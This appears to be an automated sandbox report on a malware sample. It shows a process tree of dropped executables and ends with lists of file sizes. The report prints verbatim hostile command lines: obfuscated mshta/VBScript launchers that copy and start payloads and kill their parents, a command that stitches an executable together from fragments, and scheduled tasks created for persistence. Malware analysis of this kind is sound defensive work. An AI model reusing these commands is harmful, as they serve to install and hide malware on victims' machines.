C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue193858933525b62.exe4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue192762f1cd058ddf8.exeTue192762f1cd058ddf8.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3240 -s 14162⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue193858933525b62.exeTue193858933525b62.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f3⤵
-
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f6⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO "7⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"7⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y .\bENCc.E7⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "Tue193858933525b62.exe" /f4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue1969586bcbf58493.exeTue1969586bcbf58493.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\V7X6VYqX5V5LFU4W8LpDXitt.exe"C:\Users\Admin\Pictures\Adobe Films\V7X6VYqX5V5LFU4W8LpDXitt.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Yaff3jY_QOOMPNf7k0H2wCJn.exe"C:\Users\Admin\Pictures\Adobe Films\Yaff3jY_QOOMPNf7k0H2wCJn.exe"2⤵
-
C:\Users\Admin\Documents\AwSWiBpi4RtlLhYAHRpCC3j9.exe"C:\Users\Admin\Documents\AwSWiBpi4RtlLhYAHRpCC3j9.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\A_YkvmBjLiuGTGP99cVeStRK.exe"C:\Users\Admin\Pictures\Adobe Films\A_YkvmBjLiuGTGP99cVeStRK.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\sOc1mEo78ZthC3K1hn_uzMqE.exe"C:\Users\Admin\Pictures\Adobe Films\sOc1mEo78ZthC3K1hn_uzMqE.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\sOc1mEo78ZthC3K1hn_uzMqE.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\sOc1mEo78ZthC3K1hn_uzMqE.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\sOc1mEo78ZthC3K1hn_uzMqE.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\sOc1mEo78ZthC3K1hn_uzMqE.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\eYsidTd6wCtyni2GuQ3OrKPO.exe"C:\Users\Admin\Pictures\Adobe Films\eYsidTd6wCtyni2GuQ3OrKPO.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\7Nzc_JatREqDaBvNDCGsZWjR.exe"C:\Users\Admin\Pictures\Adobe Films\7Nzc_JatREqDaBvNDCGsZWjR.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\dfX7oNZrED5f22hqhAL18Qt6.exe"C:\Users\Admin\Pictures\Adobe Films\dfX7oNZrED5f22hqhAL18Qt6.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\mgqX_OUwai8CMSBnmDKb3CR4.exe"C:\Users\Admin\Pictures\Adobe Films\mgqX_OUwai8CMSBnmDKb3CR4.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\OiMJi5nblWnKlkyLvG2OmUuD.exe"C:\Users\Admin\Pictures\Adobe Films\OiMJi5nblWnKlkyLvG2OmUuD.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\HfBdv73Q8xWHcES5M7x5nird.exe"C:\Users\Admin\Pictures\Adobe Films\HfBdv73Q8xWHcES5M7x5nird.exe"4⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\GLKZsl7sJDfPFBKV9TL8izf5.exe"C:\Users\Admin\Pictures\Adobe Films\GLKZsl7sJDfPFBKV9TL8izf5.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\iYbe7ihc91pID9iAvOEnswvy.exe"C:\Users\Admin\Pictures\Adobe Films\iYbe7ihc91pID9iAvOEnswvy.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\iYbe7ihc91pID9iAvOEnswvy.exe"C:\Users\Admin\Pictures\Adobe Films\iYbe7ihc91pID9iAvOEnswvy.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\N0Qq8Bniep6dVIT39Uye2e8j.exe"C:\Users\Admin\Pictures\Adobe Films\N0Qq8Bniep6dVIT39Uye2e8j.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 6643⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 6803⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 6683⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 6723⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 11683⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 11283⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 11363⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\JH8o2zAq0ed2IYVGNRdXvQxc.exe"C:\Users\Admin\Pictures\Adobe Films\JH8o2zAq0ed2IYVGNRdXvQxc.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-TLQKU.tmp\Tue19879c4c0e.tmp"C:\Users\Admin\AppData\Local\Temp\is-TLQKU.tmp\Tue19879c4c0e.tmp" /SL5="$4007E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19879c4c0e.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19879c4c0e.exe"C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19879c4c0e.exe" /SILENT2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-VRDM6.tmp\Tue19879c4c0e.tmp"C:\Users\Admin\AppData\Local\Temp\is-VRDM6.tmp\Tue19879c4c0e.tmp" /SL5="$401F4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19879c4c0e.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19b4ef3b53293fe.exeTue19b4ef3b53293fe.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19150ee2be694c8a4.exeTue19150ee2be694c8a4.exe /mixone1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue19150ee2be694c8a4.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19150ee2be694c8a4.exe" & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue19150ee2be694c8a4.exe" /f3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Users\Admin\AppData\Local\Temp\1FDE.exeC:\Users\Admin\AppData\Local\Temp\1FDE.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
80KB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
136KB
-
Filesize
456KB
-
Filesize
1.3MB
-
Filesize
688KB
-
Filesize
684KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
136KB
-
Filesize
6.0MB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
88KB
-
Filesize
19.0MB
-
Filesize
568KB
-
Filesize
156KB
-
Filesize
1.4MB
-
Filesize
1.4MB
-
Filesize
36KB
-
Filesize
43.0MB
-
Filesize
1.6MB
-
Filesize
1.0MB
-
Filesize
456KB
-
Filesize
108KB
-
Filesize
384KB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
80KB
-
Filesize
372KB
-
Filesize
1.0MB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
152KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
4KB
-
Filesize
292KB
-
Filesize
43.2MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
456KB
-
Filesize
308KB
-
Filesize
864KB
-
Filesize
492KB
-
Filesize
852KB